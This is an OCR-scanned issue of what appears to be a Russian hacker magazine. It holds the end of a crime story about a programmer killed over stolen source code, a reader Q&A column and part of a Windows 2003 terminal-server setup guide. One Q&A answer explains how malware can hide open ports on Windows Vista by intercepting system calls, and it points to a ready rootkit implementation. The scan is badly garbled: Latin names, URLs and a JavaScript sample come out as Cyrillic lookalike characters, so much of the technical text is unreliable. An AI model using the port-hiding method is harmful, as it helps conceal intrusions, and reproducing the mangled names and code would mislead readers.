Следовательно, наводка исключалась. Но и вто, что мимо его машины 
случайно проходил человек, которому вдруг понадобилась правая проти- 
вотуманная фара, верилось с еще большим трудом. 

— Кто-то с работы? — подумал он вслух. — Но зачем? Такой машины ни у 
кого нет. Хотя, может, у родственников... Или просто из мести? Да вроде ни 
с кем не ругался в последнее время. Или все-таки что-то было? 

Он мысленно перебрал все возможные и невозможные цепочки воз- 
никновения конфликтов на работе, даже самые невероятные. Ничего не 
клеилось. Оставалась версия слепой случайности. 

— Слепцов, даже в силу своей фамилии не верь в случай! — отрицательно 
покачал он головой. — Случайностей не бывает. Случайность — это не- 
осознанная необходимость. Или осознанная? — засомневался он. — Один 
черт — не бывает. 

Над головой неожиданно громыхнуло. Слепцов поднял глаза и увидел над 
собой большое грозовое облако. Туча медленно, но неотвратимо надви- 
галась, неся за собой туманный шлейф идущего где-то в паре километров 
отсюда ливня. В ближайшие минуты должно было накрыть и самого 
Слепцова, и его машину, лишившуюся одного глаза. Он быстро взглянул 
на часы, отметив про себя, что время еще есть, шлепнул рукой по карману, 
проверяя, на местели ключи от квартиры, и быстрыми шагами направил- 
ся к подъезду — за зонтиком. 

И он уже не видел, каксзаднего сиденья его машины поднялся человек. 
Прикрываясь мрачными грозовыми бликами на лобовом стекле, он под- 
нес к губам рацию и сказал: 

— Поднимается. Дело тридцати секунд. Я выхожу. 

Рация прохрипела что-то в ответ. Человек подождал, пока Слепцов войдет 
в подъезд, аккуратно выбрался из автомобиля и тихо прикрыл дверь. 
Сигнализация не прореагировала. 

Человек присел, делая вид, что завязывает шнурки. Потом нащупал в 
кармане маленький брелоки незаметно нажал кнопку. Замки автомобиля 
сухо щелкнули, не издав при этом ни единого писка. 

— Осторожно, двери закрываются... — произнес мужчина, поднялся и 
направился прочь со двора. Свою часть работы он сделал. Можно было 
пользоваться ее плодами. 

Тем временем Слепцов уже поднялся на свой этаж. Он протянул руку к 
двери, но в следующую секунду заметил, что она открыта. Маленькая 
щель, в несколько миллиметров, щель, которой быть не должно. 

Рука сама потянуласьза сотовымтелефоном, посколькуто, чтодверьон 
закрывал, Слепцов помнил точно. Привычка, каку Штирлица, «вырабо- 
танная годами», дергать дверь послетого, как вытащил ключ из скважи- 
ны, никогда не подводила. 

— Нуладно — фара, — шепнул Слепцов, — но хату зачем вскрывать? 

Он нащупал в карманетяжелую связку ключей от гаража, которую всегда 
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носил с собой, и решил разобраться во всем самостоятельно. Ухватив 
кончиками пальцев свободной руки краешектяжелой железной двери, он 
медленно потянул ее на себя. За петли он не волновался. И действитель- 
но — ни один звук не выдал того, что хозяин вернулся в квартиру. 

Где-то внутри слышался то ли шорох, то л и шелест. Потом что-то 
упало, кто-то выругался. Слепцов, все еще уверенный, что ничего 
случайно не происходит, попытался узнать, кому принадлежит голос. 
Безрезультатно. Тогда он вошел в квартиру и оставил дверь открытой 

— на всякий случай. 

— Смотри, все так, какя и говорил, — неожиданно громко сказал кто-то в 
комнате. — Не зря мы здесь. 

Задача неожиданно осложниласьтем, что человек, проникший в его 
квартиру, был не один. Слепцов засомневался в целесообразности на- 
хождения здесь: «Может, лучше милиция? Вдругу них есть оружие?» 
Нобывший десантник взял в нем верх, и он продолжил медленно 
двигаться по коридору в сторону голоса. Тем временем люди перешли на 
шепот и принялись что-то оживленно обсуждать. 

И когда Слепцов был уже готов ворваться в комнату и разобраться с 
непрошеными гостями, что-то тяжелое обрушилось ему на голову сзади. 
Свет померк, и он провалился куда-то вотьму... 

Сколько прошло времени, трудно было сказать. Он лежал на паркете, при- 
жимаясь к нему щекой. Руки были свободны — это он понял сразу, когда 
ощутил боль в голове и машинально прижал ладонь кзатылку. Первые 
секунды он еще не понимал, что произошло. Когда Слепцов пришел в 
себя, он ощущал только боль, жжение и тошноту. 

Захотелось свернуться в клубок, постонать, отгоняя прочь от себя боль. 
Еще с детства он помнил: когда стонешь, становится легче. И он издал 
звук, похожий на стон. 

— Очнулся, — тутже раздался рядом с ним голос. — Сначала подумал, что 
он рукой шевелитбез сознания... Можно поднимать? 

— Давай, — второй голос был властным. — Вот, в кресло. Со стула он 
упадет. И воды принеси из кухни. Лучше побольше. 

Слепцова подняли с пола чьи-то сильные руки. Мир качнулся. Он по- 
пытался идти, но ничего не получилось — ноги подкашивались, словно 
ватные, и он покорился силетого, кто его нес. 

Через несколько секунд все вокруг совершило почти полный оборот, он 
взмахнул руками и почувствовал подсобой кресло. Попытался поднять 
голову — не смог. Все, на что его хватило, — это медленно оторвать на- 
литые свинцом руки от подлокотников и обхватить ими затылок. Пальцы 
ощутили запекшуюся на волосах кровь. 

— За что? — вопрос был задан машинально. 

— Откройте глаза, — сказал тот, кто потребовал поднять его с пола. Слеп- 
цов отрицательно замотал головой и тутже скривился отзахлестнувшей 
его боли. — Вот вам стакан воды, выпейте. 

Кто-то оторвал его руку от головы и сунул в ладонь холодное стекло. Слеп- 
цов, по-прежнему не открывая глаз, приложил стакан к губам. Хлориро- 
ванная вода вызвалау него гримасу отвращения. 

— Дерьмо... — скривился он. — В холодильнике есть пиво... 

— И без пива хорошо, — ответили откуда-то из-за спины. Потом стакан 
отобрали и плеснули водой в лицо. Вздрогнув, какотудара, он машиналь- 
но размазал воду руками. — Глаза открывай! Разговор есть. 

Слепцов кивнул, если можно назвать кивком безвольное движение 
головы, после чего открыл глаза и прищурился. Рядом с собой он увидел 
человека с пластиковой бутылкой, который смотрел в его глаза, пытаясь 
выяснить, насколько к нему вернулось сознание и понимание происходя- 
щего. Неподалеку, на диване, сидел еще один человек — судя по всему, 
обладатель второго голоса. Закинув ногу на ногу, он листал какой-то 



журнал, не глядя в сторону Слепцова. Было в его позе что-то такое, отчего 
сразу становилось еще страшнее, — что-то от Воланда. Казалось, что этот 
человек может все и ничего хорошего от него ждать нельзя. 

— Добрый вечер, — сделал глупую и неудачную попытку завязать разго- 
вор Слепцов. — Чем обязан? 

Человек отложил в сторону журнал, усмехнулся и наклонился куда-то за 
диван — похоже, он там что-то прятал, а сейчас решил достать. Слепцов 
внутренне напрягся, надеясьничем не выдатьсвоего волнения, но не 
смог сдержать короткого вскрика, когда мужчина достал из-за дивана и 
положил на стеклянный столик посреди комнаты ТУ САМУЮ украденную 
противотуманную фару. 

— Знакомьтесь, — человекаккуратно убрал от нее руки, после чего кон- 
чиком пальца чуть-чуть подтолкнул фару в сторону Слепцова. — Или вы 
ужезнакомы? Не стесняйтесь в выражениях, смелее! 

Мужчина засмеялся. И смех его сказал Слепцову гораздо больше, чем за- 
пекшаяся кровь на затылке. Это был смех хозяина положения, человека, 
который оказался здесь явно не по ошибке и не для того, чтобы вернуть 
владельцуукраденную фару. 

— Знаком, — после непродолжительного раздумья сказал Слепцов. — Но 
никак не ожидал встретить ее у себя дома. 

— Честно говоря, я и сам не предполагал, что так получится, — собесед- 
ник встал, подошел кокну и отодвинул шторку. — Это в некотором роде 
импровизация. Но, на мой взгляд, она идетчетко, по аналогии... Скажите, 
вам страшно? 

Слепцов усмехнулся. 

— Страх — это естественное чувство. Но его практически полностью 
перекрывает непонимание происходящего. Так что мне страшно, да. Но 
вот если вы мне объясните, в чем дело, я, пожалуй, буду бояться несколько 
более осознанно. 

Он сам удивился своей смелой речи, ведь ситуация, в которой он сейчас 
находился, была просто из ряда вон. Никто и никогда не нападал на него 
в его квартире, никто и никогда не вел с ним бесед «а-ля Голливуд», по- 
ливая голову минералкой. Короче говоря, страшно было до чертиков, но 
организм как-то мобилизовался; Слепцов не знал, надолго ли его хватит, 
но пока силы еще были. 

— Объясню, — мужчина кивнул. — С превеликой радостью. Понимаете, 
Слепцов — вы уж извините, что я вас знаю, а сам не представляюсь — эта 
фара на столике очень правильный символ. Вы помните свои чувства, 
когда увидели вместо нее дырку в бампере? 

Слепцов хотел было ответить, но мужчина взмахом руки не дал ему 
открыть рот. 

— Не мешайте мне говорить. Будет время — вас спросят. Так вот, то, что 
ощутили вы, пережил и я около полугода назад... 

Слепцов слушал очень внимательно, но неожиданнозаметил, что второй 
человек куда-то исчез. Вот он только что стоял где-то сбоку, а сейчас не 
слышно ни его шагов, ни дыхания. 

— Представляете, те же самые ощущения — дырка в бампере. 

— У вас что-то украли? — попытался сыграть в угадайку Слепцов, чтобы 
превратить монологв диалог. 

— Не фару, милейший, — услышал он в ответ. — Это было даже хуже, чем 
дырка в бампере. Я сейчас буду говорить прописные истины, но боюсь, 
что вам не дано понять ни слова изтого, что я скажу. Вы — из другого мира. 
Вы — русский. 

— А вы нет? — Слепцовухмыльнулся. — Вы прибыли сдругой планеты 
рассказать мне какие-то бредни про ворованные фары? 

— Я? С другой планеты? — мужчина снова опустился на диван и при- 
вычным жестом поправил стрелки на брюках. — Ни в коем случае. 
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Однозначно с планеты Земля. Никакой альфы Центавра, никаких 
Азимовых и Шекли. Суровая проза жизни. 

Он помолчал немного, разглядывая лежащую на столике фару. Казалось, 
напряженность на некоторое время спала; Слепцов судорожно раз- 
мышлял, куда бы сейчас направить разговор, чтобы вести его мягко и в 
то же время максимально информативно, нотишина была неожиданно 
нарушена вопросом: 

— Вам ведьуже почти сороклет, без малого, — мужчина наклонил 
голову и пристально посмотрел в глаза Слепцову. — Говорят, люди всю 
жизнь слушаютту музыку, которая произвела на них наибольшее впе- 
чатление в юности. Вот мы с вами практически ровесники, и я обожаю 
«Воскресенье» и «Битлс». А вам нравится творчество «Скорпионе»? 
Слепцов напрягся. Вопрос был задан явно неспроста. В ответ пришлось 
кивнуть. 

— Да, в основном их ранние вещи... 

— И именно поэтому пароль на вашем компьютере «Рогеѵег Іп Тгапсе»? 
Отвечать было незачем. Вопрос был наполовину риторическим, наполо- 
вину издевательским. Оставалосьтолько сопеть, раздувая в бессильной 
злобе ноздри, и скрипеть зубами. 

— Ачего в ы та кнапря гл ись? — искренне удивился собеседник. — У 
вас там какие-то тайны? Не думаю. Вы же не банковский сотрудник, 
и компьютер у вас стоит йена кассе... Да, пароль — это не проблема. 
Кому, как не вам, должно быть это известно. Давайте условимся — не 
будем делать глаза, как у мопса, поскольку каждый из нас прекрас- 
но понимает, чем живет. Вот, например, вы, чем вы зарабатываете 
себе на кусокхлеба? Но, прежде чем вы ответите, напомню, врать 
мне бессмысленно. Итак, я жду откровений, от этого многое будет 
зависеть в дальнейшем. 

Слепцов скрипнул зубами. Они знают пароль. «Но что там можно взять? 

— понеслись в его голове мысли. — Есть несколько исходников, несколько 
готовых работ... Адреса заказчиков? Не помню, чтобы вносил их куда-то на 
компе, всеу меня в смартфоне. Продолжать играть с ним или воспользо- 
ваться тем, что у меня свободные руки, встать и навалять ему между глаз? 
Сил ведь должно хватить. Но есть второй; похоже, он сейчас за компьюте- 
ром в другой комнате. Прибежиттутже...» 

— Ладно, будем играть по вашим правилам, — нехотя начал Слепцов. 

— Чем я зарабатываю себе на жизнь? Я программист. Судя по зарплате и 
уровнюжизни — востребованный. 

— Я ведь просил вас не врать, — мужчина сверкнул глазами. — Вы 
искренни лишьотчасти — вы скрываете такой мощный пластсвоей 
деятельности, что просто диву даешься, как вы могли о нем неупомянуть. 
Ну а раз вы пошли потакому пути, то я от вас не отстану. Я зарабатываю на 
своюжизньтем, чтозаставляю людей выполнять невыполнимые задачи. 

— То есть? — непонимающе поднял брови Слепцов. 

— Какхотите.таки понимайте, — покачал головой собеседник. — Я ведь 
принял ваше вранье про программиста, воти вы напрягитесь. 

— Хорошо... Но тогда по какой причине наши пути пересеклись? И за ка- 
ким чертом вам понадобилось вороватьу меня фару отавтомобиля, после 
чего тащить ее сюда и ожидать встречи схозяином?! 

Мужчина вздохнул, после чего выдержал довольно приличную паузу и 
произнес: 

— Вы невнимательно меня слушали. Я здесь, чтобы заставить вас вы- 
полнить невыполнимую задачу. 

— Меня? Заставить? — Слепцов хмыкнул. — Каким, интересно, образом? 

— А вот каким, — в комнатеснова появился второй человек — тот самый, 
что поливал его минералкой. Он держал в руках пистолет, направленный 
на Слепцова. — Какдумаете, сработает? 



— Думаю, да, — машинально ответил тот. — Вы боевиков насмотрелись? 
Чего вам надо? 

— Все предельно просто. На столе перед собой вы видите вашу собствен- 
ную фару. От вашего форда. Думаю, не стоит и проверять — это именно 
она. Задача состоит в следующем... 

Мужчина снова наклонился за диван и поднял с пола довольнотяжелый 
предмет. Когда Слепцов разглядел, что именно, то даже присвистнул. 

Это оказалась довольно большая фара с «хрустальным» отражателем. Ее 
положили рядом с противотуманкой, при сравнении она оказалась почти 
в два раза больше. 

— Красиво? — спросил собеседник. — Это фара от мерседеса. Самая 
обыкновенная фара от самого обыкновенного Мерседеса, если, конечно, 
подобная фраза имеет право на существование. Поскольку, как вы сами 
понимаете, «обыкновенных мерседесов» не бывает. Каждый из них — это 
произведение автомобильного искусства... И задача ваша будет не из 
простых. Эдакий Форт Баярд. Вам придется взять эту фару и установить 
ее на место украденной противотуманки затридцать минут. Все очень 
просто, как вы видите. 

Слепцов слушал все это как какой-то бред. Он и раньше не понимал, что 
происходит, а когда услышал, чего от него хотят под угрозой расправы, то 
вообще пришел в состояние, близкое к панике. 

— Вы в своем уме? — спросил он. — Кактакое возможно? Она же эле- 
ментарно больше, не говоря уже о массе других отличий типа креплений, 
расположения фишки для проводов! Это нереально! 

— Конечно, нереально, — мужчина согласился. — Но ведьэта фара луч- 
ше. Азначит, придется что-то придумать. 

— Причем здесь«лучше»?! — крикнул Слепцов. — Это нета сфера жизни, 
где ориентируются нато, что лучше! Каждой машине — свои фары, свои 
колеса, свои запчасти! Хватит играть здесь в идиотов! Говорите, что вам 
надо! 

— Я уже сказал. Время пошло. Тридцать минут. Или вы будете убиты. 
Мужчина встал, подошел кокну и закурил. 

— Чего вы от меня хотите? — уже безо всякого крика, почти жалобно 
спросил Слепцов. 

— Полгода назад, господин программист, вы украли почти гото- 
вый проект, — выпустив струю дыма в потолок, ответил мужчина. 

— Украли виртуозно. Никто ничего не заподозрил. Вы взяли 
исходники и, стоит отдать вам должное, создали на их основе 
прекрасный продукт... 

Слепцов слушал и понимал, что человекзнает, о чем говорит. Каждое 
слово было правдой. 

— ...Я бы даже сказал, ВЫ СДЕЛАЛИ ЕГО ЛУЧШЕ. Из фары для форда вы 
сделали фару для мерседеса. И сумели запихнуть еетуда, куда сейчас 
даже не пытаетесь... 

— Вы... — начал былоСлепцов, но говоритьему недали. 

— Молчите! Вы можете много рассуждать натемутого, что без вашего 
участия получилось бы что-то такое средненькое, неудобоваримое... Да, 
вы правы. Вы сделали лучше. Но мне не надо лучше. Мне надо так, каку 
меня было... 

Слепцов замер с широко раскрытым ртом. Так вот кто у него в гостях! 

— И поэтому я сейчас здесь. Чтобы вы поняли, что каждому дорога 
именно его фара. Та, которая подходитего машине. Правда, жить с этим 
пониманием вы будете недолго... 

Уходя, в дверяхон оглянулся натруп и спросил: 

— Фары забирать будем? Хотя нет, пусть лежат. Интересная получится 
задачка для опергруппы. Надеюсь, ты вычистил его компьютертакже, как 
его череп от мозгов? Воти славно. Поехал и. .. т 



^ ипі+г 




СТЕПАН «ЗТЕР» ИЛЬИН 



РАОГЭКЕАІ..ХАКЕР.КІІ 



Задавая вопрос, подумай! Не стоит мне посылать вопросы, так или иначе связанные с хаком/кряком/ 
фриком — для этого есть Наск-Рад (ЬаскГад@геа1.хакер.ги); не стоит также задавать откровенно ламерские 
вопросы, ответ на которые ты при определенном желании можешь найти и сам. Я не телепат, поэтому 
конкретизируй вопрос, присылай как можно больше информации. 
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0: Многие методы для создания невидимых в системе приложений, 
к которым я давно привык, перестали работать в ѴѴіпсІоѵѵз Ѵізіа. Ни 
один из ранее используемых способов для сокрытия открытых портов 
под Вистой не работает. Как быть, что можешь подсказать? 

А: Дело в том, что и сам список открытых портов под ѴѴІпсІоѵѵз Ѵізіа 
программы теперь получают иным способом. Большинство прило- 
жений, в том числе и стандартная пеІщЦЕехе, вызывают функцию 
Іпѣегпа10ёіТсрТаЫе2 .экспорт и р у е м у ю -из- 6 и 6л и от ші I рН+р-а рі.бН. 

Та в свою очередь передаетуправление МвіАІІосаіеАпсІѲеіТаЫе и 
МвіЕпитегаіеО^есізАЦРагатеіегвЕх, входящим в состав РБЕки 
пві.сНІ, которая предназначена для взаимодействия с модулем ядра 
— N51. ЕсДи учесть некоторые особенности новой системы, эти обра- 
щения вполне можно перехватить. Готовую реализацию™ можешь 
найти, перейдя'по этому линку: ѵѵѵѵѵѵ.гооікіЕсот/ѵаии/сагбппааіс/ 
РогіНісІРето Ѵізіа.с . 



0: Здравствуйте. Хочу поставить никсовую систему на свой іВоок 
(Роѵѵег РС 64) МасОБ X. Возможно ли это? Если да, то как? А то на Мае 
у нас в городе ничего нет, да и вообще хотелось бы иметь две оси на 
компе. 

А: На твой случай есть одна замечательная программа, от которой 
давнотащатся миллионы продвинутых пользователей Мас’а. Речь 
идет о РагаІІеІБ Резкіор ЬллллллрагаЦеІз.сот/еп/ргосІисізАл/огкзІаііоп/ 
та с ) — своеобразном аналоге Ѵтѵѵа ге дл^ Мас’-а, но с^более широкими 
возможностями. С ее помощью ты сможешь запускать не только любую 
ІІпіх-систем, ной ѴѴіпсІоѵѵз. Причемпереключение производится ' 
прозрачно, без необходимости перегружать компьютер и прыжков с 
бубном. Особенно хочется поблагодарить разработчиков за алгоритмы 
виртуализации, позволяющие гостевой системе работать вообще без 
каких-либо тормозов и задержек. Помимо всего прочего, РагаІІеІБ 
Резкіор дает возможность быстро переносить файлы (| системы на 
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систему обычным сігад-апсі-сігор’ом, запускать виндовые приложение 
под Мас'о м, дела ть снимки системы и быстро к ним возвращаться. 
Вещь по-настоящему потрясающая. Кстати, существует версия и для 
ѴѴІ г|бо\л/5.| 

О: Здравствуйте. Подскажите, чем отличается упаковщик (например, 
АЗРаск) от протектора (например, А5Рго(ес()? Заранее спасибо. 

А: Упаковщик — это что-то типа архиватора, но для ехе и б II. Програм- 
мы, упакованные с помощью того же АЗРаск, автоматически распа- 
ковываются в момент Запуска, поэтому на работе пользователя это 
никак не сказывается. Чаще всего он даже не подозревает, что имеет 
делю с упакованным бинарником. Не кото-рое время программисты 
использовали упаковщики, и в том числе АЗРаск, для защиты своих 
приложений: сжатые программы не так легко поддаются отладке и, 
соответственно, взлому. Однако сейчас для них существует множес- 
тво-автоматических распаковщиков. Поэтому для более устойчивой- 
защиты біііли разработаны протекторы. В большинстве своем они 
используются производителями коммерческого софта для создания 
ТРІАІ_-версий приложений с возможностью дальнейшей регистрации 
программы с помощью ключей. Помимо этого, протекторы преобразу- 
ют исходный код приложения, снабжая его различными антиотладоч- 
ными средствами. Однако непробиваемой такую защиту сейчас вряд 
ли назовешь. 

О: Современные онлайн-приложения, например боодіе Реасіег и 
бтаіі, поддерживают горячие клавиши, которые в случае ежеднев- 
ного использования сервисов серьезно облегчают жизнь. Как бы 
реализовать подобную фичу для своего сайта? 

А: Проще всего воспользоваться уже готовой библиотекой ( ѵѵѵѵѵѵ. 
орепіз.сот/зсгіріз/еѵепіз/кеѵЬоагсІ БІногІхиЫ . Мы проверили ее 
лично: работает она на ура, позволяя добавлять горячие клавиши и 
назначать для них действия всего в нескольких строфх кода. Вот тебе 
пример: 

зкюгксик ( "ССгІ+В" , кипскіоп ( ) { 

аіегк ( "ТЬе Ьоокшагкз ок уоиг Ътоѵізет ѵѵііі зкюм ир 
аккег кМз аіегк 
} Л 

' куре ' : ' кеусіоѵт ' , 

'ргорадаке' :кгие, 

'кагдек' :<іосишепк 

}) ; 

О: Г тала работать материнская плата. Думаю, полетел какой-то 
из конденсаторов. Но как найти, какой именно из них сбоит? 

АіХарактфрное вздутие — верный признактого, что с конденсатором 
что-то нетак, и даже если сейчас он работает вполне нормально, то 
все равно имеет все шансы вскоре выйти из строя. Любое изменение с 
сам-им конденсатором: а также с прокладкой, закрывающей его снизу, 
непременно приводит куменышению его емкости и, соответственно, 
работоспособности всей платы. Проверить емкость конденсатора мож- 
но с помощью самого простого мультиметра, который приобретается в 
лю&ом раДиомаГазине за 1 5-25 долларов. 

О: Сейчас активно продают оборудование для создания локальной 
сети через розетку. Но как это работает? Просто вставляешь несколько 



компьютеров в розетку и все? Даже не верится, что это действительно 
реально. 

А: На самом деле технология Роѵѵегііпе появилась очень давно, и 
споры по поводу ее работоспособности давно стихли. Еще десятиле- 
тия назад низкоскоростные (скорость иногда ниже, чем 0,01 Кбит/с) 
технологии стали и спользовать в энергетике на высоковольтных 
магистралях для передачи информации о напряжении на подстанциях 
и прочей технической информации.. Сейчас же активно развиваются 
высокоскоростные стандарты РІ_С (Роѵѵег Ыпе Соттипісабоп), поз- 
воляющие.передавать данные на скоростях в десятки Мбит/с. Задача 
это, понятно, непростая. Только вспомни нашу отечественную провод- 
—ку >ѳп л о ш ь и рядом ветхие провода, -которые в большинстве случаев 
проложены десятилетия назад. Мало того что они имеют кучу изгибов 
и повреждений, а также наспех спаянных сцепок, так еіце и электро- 
энергия по ним передается под высоким напряжением! Море помех, 
с которыми надѳ-бороться, плюс разделяемая среда — одна на всех. 
Ничего не напоминает? Условия очень похожи на радиоэфир, поэтому 
здесь используются практически те’же самые алгоритмы модуляции и 
принципы передачи сигнала. Занимается модуляцией/демодуляцией 
специальный РІ_С-модем — именно он вставляется в розетку, а от н*его 
к компьютеру в свою очередь идет самый обыкновенный патч -корд 
(хотя существуют версии 115В, но это редкость). Преимущество техно- 
логии заключается в том, что электрические кабели уже проложены 
по всей квартире, поэтому ничего не потребуется устанавливать. Вся 
система более чем работоспособна: в России даже есть провайдеры, 
предоставляющие интернет-услуги как раз посредством РІ_С. Пользу- 
юсь подобной штукой уже года два, й знаешь, работает она на уровне. 

1 5-25 Мбит/с — это вполне реальная скорость, которая, правда, сильно 
зависит от расстояния до щитка с РЮ-инжектором (устройством, ко- 
торое транслирует в электрическую сеть сигнал с данными), загружен- 
ности и общего состояния проводки. 

О: Ну и намучился же я в последнюю сессию со всеми этими курсовы- 
ми, рефератами, научными работами. Мало того что нужно работать 
над содержанием, так ведь еще и оформление требуют строго по всем 
ГОСТам. Глупо, но что делать — приходится часами подгонять матери- 
ал под все правила оформления. Подскажи, какэтот процесс можно 
автоматизировать? 

А: Как раз для этого случая существует специальная насадка на 
Місгозоб ѴѴогб, называется она Віззег ( ѵѵѵѵѵѵ. капкоѵѵвкі. па госі.ги/вок/ 
сИвзег.Ыт ). По сути, это просто набор макросов, но каких! Все для тебя: 
работа со списком литературы, вставки рисунков, таблиц и формул, 
оформленных по.всем правилам и ста ища рта м . Дао б е ьш о ц е ьшы 
шаблоны реферата и курсовика. Оттебя требуется вставить в файл 
содержимое, оформление ОІББег берет на себя. 

О: Как подружить іРос! и ѴѴіпатр? 

А: 1 . Думаю, что ІРоб уже подключен к компьютеру, так? Запусти ІТипез 
и перейди-во вкладку 5-еиіпдз. Пролистай-вни-з до секции Орбопз и 
деактивируй опцию «О реп ІТипез ѵѵбеп іЬіб іРоб іб аиасбесі», а затем 
включи «ЕпаЫе сІІБк изе Ьох»: Теперь ІРоб должен отобразиться в 
системе как внешний жесткий диск! 

2. Осталось только повозиться с ѴѴіп’атр’ом: во время установки 
обязательно включи в состав сборки «РогІаЫе Мебіа Ріауег Зиррогі -> 
ІРосІ зи ррогк». Вот, собственно и все. Теперь, открыв ѴѴіпатр, можно 
вызвать Месііа ЫЬгагу и выбрать свфй плеер в списке РогіаЫез Іізк ИИ 
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Один НА ВСЕХ 

И ВСЕ НА ОДНОГО 

Настройка сервера терминалов в ѴѴіпсІоѵѵз 2003 



Приручение * » 

ПОЧТОВОГО ГОЛУБЯ г 

РозіТіх + Ооѵесоі: + Му$(2Ь: строим надежный почтовый сервер 



Сам себе файрвол, 

САМ СЕБЕ МАРШРУТИЗАТОР 

Настраиваем межсетевой экран на базе ІрііаЫез + РаіхЬ-о-таіііс 



Секреты 

ТУРБОРЕАКТИВНОГО ПОЛЕТА 

Тонкая настройка параметров ТСР/ІР под толстые каналы 
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Один НА ВСЕХ 

И ВСЕ НА ОДНОГО 



НАСТРОЙКА СЕРВЕРА ТЕРМИНАЛОВ В ѴѴШ00ѴѴ5 2003 

Сегодня наиболее популярной является модель «один компьютер — одно приложение», когда на каждом 
компьютере, на котором работает пользователь, устанавливаются все необходимые для работы прило- 
жения. Такая схема не очень удобна, так как каждая установка часто требует отдельной лицензии. Кроме 
того, необходимо следить за обновлением приложений на всех компьютерах, защищать их от вирусов. 

Не стоит забывать и про финансовый момент: обычные клиентские компьютеры, в отличие от терми- 
нальных, должны обладать достаточной мощностью для «автономной» работы. А если еще сотрудники не 
имеют постоянного места? Использование терминальных систем упростит решение этих проблем. 



Сервер терминалов ѴѴіпсІоѵѵз 2003 

В те далекие времена, когда компьютеры были большими, терминаль- 
ным доступом удивить кого-либо было трудно. Затем пришел век персо- 
налок, и некоторое время уделом терминалов считались исключительно 
ІІпіх-системы. С ростом сетей и увеличением мощности компьютеров о 
терминалах вспомнили снова. С одной стороны, появилась потребность 
в объединении ресурсов, с другой — в компаниях накопилось большое 
количество компьютеров старого парка, которые выбросить жалко, а 
использовать проблематично. Почему бы не использовать их в качестве 
терминала? Ведь ему не нужно обрабатывать информацию, он просто 
выводит результат на экран, а для этого особых мощностей не требуется. 
Первой реализацией операционной системы от МісгозоН, поддержива- 
ющей работу с терминалами, был патч к N4 4.0 Тегтіпаі Зегѵег Ебігіоп, 



а в 2000 Зегѵег нужный компонент уже включался в состав системы. В 
ѴѴіпбоѵѵз 2003 Зегѵег поддержка терминального подключения получила 
дальнейшее развитие, став более удобной и понятной в администриро- 
вании. Этот вариант мы и будем рассматривать. Здесь реализовано два 
режима работы: 

1 . Дистанционное управление рабочим столом (Кетозе Пезкюр Гог 
Абтіпізігагіоп) — этот режим предназначен для удаленного управления 
сервером администраторами; в ѴѴіпбоѵѵз 2000 этот режим назывался 
Тегтіпаі Зегѵісез іп Кетот Абтіпізігайоп тобе, что часто сбивало с 
толку новичков . 

2. Сервер терминалов (Тегтіпаі Зегѵег тобе) — предназначен для под- 
ключения удаленных пользователей. 

В первом режиме возможны только два одновременных 
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ШЗР-подключения, а также удаленное подключение к консольному 
сеансу сервера (этого не хватало в ѴѴіп2К) . Этот режим не требует 
дополнительного лицензирования. Активировать его очень просто. 
Выбираем «Панель управления -> Система», переходим во вкладку 
«Удаленное использование» и устанавливаем флажок «Включить 
удаленный доступ к рабочему столу». По умолчанию доступ разре- 
шен только локальным администраторам. Для того чтобы добавить 
других пользователей, нажимаем кнопку «Выбрать удаленных 
пользователей» и указываем нужные. После первого использования 
кнопка пропадает, в дальнейшем изменить состав пользователей 
можно через вкладку «Администрирование Управление компью- 
тером», добавив их в группу «Пользователи удаленного рабочего 
стола». Также следует помнить, что включение Кетозе Оезкіюр не 
активирует систему совместимости приложений, поэтому некото- 
рые приложения могут работать некорректно. 

В режиме сервера терминалов количество подключений не ограничено, 
но этот режим требует дополнительного лицензирования. Для управ- 
ления клиентскими лицензиями используется специальная служба 
Теппіпаі ЗегѵегІлсепзіп§, которая может управлять выдачей маркеров 
для нескольких серверов терминалов. При отсутствии в сети установлен- 
ного и активированного в службе МісгозоЙ СІеагіп^Ьоизе сервера ТЗЬ, 
клиентам будут выдаваться только временные маркеры, действитель- 
ные в течение 120 дней (90 в ѴѴіп2К) . Этот период называется льготным 
периодом, он начинается с момент первого подключения клиента к 
серверу терминалов. Льготный период предназначен не для раздачи 
временного доступа клиентам, а для того чтобы администратору было 
достаточно времени на развертывание сервера лицензий. В соответс- 
твии с лицензионным соглашением доступ к серверу терминалов без 
лицензий не предусмотрен. 

Итак, устанавливаем сервер. 

Установка сервера терминалов 

При установке ОС большая часть сервисов не устанавливается, это 
делается по многим причинам, главная из которых — безопасность. 

В дальнейшем администратор сам должен определить роль, которую 
будет выполнять сервер. Учитывая возможность большой нагрузки, 
сервер терминалов следует разворачивать на отдельном компьютере. 
Установить ТЗ можно двумя способами. Первый — отметить флажок 
«Сервер терминалов» во вкладке «Установка компонентов ѴѴіпсІоѵѵз», 
которая находится в «Установке и удалении программ». Второй вари- 
ант — использовать окно «Управление данным сервером» (Мапа§іп§ 
уоиг сотриіег) . Выбираем «Добавить или удалить роль». В появив- 
шемся списке совместимых ролей указываем «Сервер терминалов» и 
идем дальше, подтверждая необходимость перегрузки компьютера. 



Перезагрузка будет выполнена автоматически, поэтому все приложе- 
ния следует закрыть заранее. 

Теперь необходимо установить сервер лицензий. Заходим в «Установку 
компонентов ѴѴіпсІоѵѵз» и отмечаем флажком пункт «Лицензирование 
сервера терминалов». В процессе установки следует определиться с 
доступностью сервера. Возможен выбор одного из двух вариантов: «Для 
всего предприятия» или «Для вашего домена или рабочей группы». По 
умолчанию устанавливается сервер лицензий предприятия, который 
подходит для всех случаев, хотя в первую очередь предназначен для 
использования в сетях с несколькими доменами. Для отдельного домена 
или рабочей группы можно выбрать и второй вариант. 

После установки сервер терминальных лицензий необходимо 
активировать. Заходим в «Панель управления -> Администриро- 
вание», выбираем «Лицензирование сервера терминалов». Как 
видим, сервер находится в состоянии «Не активирован» (во вкладке 
он появляется не сразу, а через некоторое время), щелкаем правой 
кнопкой мышки и говорим «Активировать сервер». Появляется 
мастер активации сервера лицензий, с которым предстоит пройти 
несколько шагов. Сначала выбираем метод активации. Если есть 
прямой выход в интернет, лучше оставить то, что есть, то есть 
«Автоподключение», в этом случае будет произведен поиск сервера 
активации МісгозоН. Хотя возможны варианты заполнения веб- 
страницы и активации по телефону. Далее необходимо указать 
некоторую персональную информацию (имя, фамилию, органи- 
зацию и страну) и на следующем шаге — сведения об организации 
(почтовый и электронный адрес, город, область). 

При активации сервера лицензий серверу выдается цифровой сертифи- 
кат стандартах. 509 с ограниченным сроком использования, подтверж- 
дающий его принадлежность и подлинность. Этот сертификат затем 
используется для получения и выдачи лицензий клиентам. Установив 
флажок в последнем окне, можно активировать мастер клиентских ли- 
